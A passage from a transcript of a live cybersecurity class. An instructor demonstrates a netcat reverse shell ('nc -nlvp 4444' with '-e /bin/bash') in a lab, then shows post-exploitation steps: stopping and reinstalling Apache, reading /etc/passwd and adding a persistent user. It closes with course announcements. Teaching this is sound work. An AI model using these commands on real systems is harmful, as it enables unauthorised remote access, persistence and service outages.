server. The server here becomes the victim. It connects to the hacker machine and gives access. Tell me, please execute commands on my system, right? For the sake of explanation, I've told the target here is a victim normal user, but most of the time our targets or the hacker targets is going to be the server, some way to code and execute commands out there. Right. For instance, let's say you can do, right? What are the other impacts you can do over here? Also, we can have a look at it, right? So let me rechange it. Instead of running Kali as the server here, I will make the Kali the victim out here, right? I'll make bbox the process out there. So why I'm trying to do that part is that depending on the user you have access to, that you will be able to get this process done. So I'm going to give an NC-NLVP and port number 4444, right? What is the IP address here is, I have config and 146, I think so, right? Yes. So now Kali machine is acting as a victim here. -e/bin/bash, right? So now it's connected. So if I give ID, it will tell root, then you name, and it's giving them, right? It's giving information about all those things. Now, can I do other things, anything other than this part, right? So see here, there is a web server running in Kali by default, right? It is not running at all right now. Can I start that web server in the Kali machine via bbox? right? System control start Apache. This code gets executed, right? If you run here, so it is running. If I go to my system here, if I give localhost, you see Apache website is done, right? Let's say you are an attacker, you gain access to a web service, web server. What you can try to delete, right? You can do is system control. All you have to do is stop Apache 2, right? I can do this. You will see now the website is down, right? It's not running anymore. You can bring down the website. Not only that, let's say I can try to install something, let me apt. Let me remove the Apache part out here. Okay. Just want to try a few things out here. Is it possible or not? It is not that always certain things will not work the way you want. So what I'm doing is that I'm uninstalling the Apache server out here. Okay. What I want to do is that I want to check, can I install any program on the target machine? Okay. For instance, now if I give system control, status Apache 2, it is telling service does not found out there. So it will not going to work, right? So now can I do apt install Apache 2? Okay, now it is installed. All I have to do is system control, start Apache 2, check out in the Kali machine. It is running back. So now with the victim machine, I can install any tool. I can make it much more further and things. I can even draw data out of it and take out of it out there, right? So one more thing, since the Kali Linux is logged in as root, the impact of this attack is at a higher level because I can completely take anything out of here, right? This particular simple command, what I did, one single line, only couple of characters that are there, the impact it has is very, very high out there, right? Is it possible for me to add a user? Right? That user gets added out here. If you see here, I give cat/etc pass WD, you will see there's a new user added to that, which just got added out there. Now attacker can actually create an admin user and then he can come in and log out anytime he wants, right? Same thing happens for any process that is going to be there. I'm just telling you, reverse shell is a concept. The way of achieving reverse shell, it is not mandatory. It has to be coming from a malware itself. There are certain web application vulnerabilities that can be used to overcome this. There are certain times code execution issues that can be done out there. But the end goal is this. So that is the approach of that part. Hope it's you understood what I was trying to do. So that is how a predominantly a reverse shell works, and it plays a very important role, right? Uh, this is the whatever the things that are there for securing your firewall, whatever the protection that is been put in place, biometrics, firewall, IDPS, and whatever that is there, it is there to protect this particular action of the right. The end point is that because this is the maximum complete compromise that is going to happen. Once this goes down, nothing you can do about it, right? So this is the main idea for that part. So any questions from this part?
I think thank you, Mr. Karthik, for this wonderful session.
Welcome.
Guys, we have a one announcement. Our morning batch was started. US morning batch, that is a 10:30 Central, 11:30 Eastern, and a 5 p.m. West African time. I think for 5 p.m. for GMT as well. It started yesterday. Yesterday was our introduction class. Our next cybersecurity evening batch, US evening, that is 7:30 p.m. Central, 7:30, 8:30 p.m. Eastern, and like morning 2 o'clock in West African time. IST it will be little early, I think 7 o'clock morning. So if you have a plan to pursue a career in cybersecurity DevSecOps position, let us know. So yeah, and the registration link is open. You can complete the registration. If you have any doubt or question, feel free to ask. After this session, around after what is the time now? After 20 minutes later, we are going to start our DevOps session for today. Today, the DevOps out of 8 is, I think, is 6 days, and we are going to cover the Terraform with Ansible, which is a hands-on. It's a very rare opportunity you will find in a workshop like this, because most of the workshop where it is like a kind of demo of their training, but not at all about the coursework. Here it is like a hands-on on the main like topic or main tool set which you are going to work, right? So if you have any question, doubt, feel free to ask. Any question is welcome. It should be technical and job related will be appreciable. So I I can see the Okulade is here. So he have completed our job ready training for DevOps and cybersecurity. Okulade, can you hear us? And he also joined
Yes,
our. So you completed our DevOps training, right?
yes, in 2022.
Yeah. So how's your thing is going on from your end?
It's going on well. For me, it's been an accumulation of lots of knowledge that's helping me.
Great. After a long time.
Every session, every course has its own advantage and learnings that would accumulate in the long run to help your understanding of concepts as you advance in cybersecurity.
Yes. True. After a long time seeing you. So guys, any question, or we can wrap up today's cybersecurity class and we can wait for another 20 minutes for our DevOps session.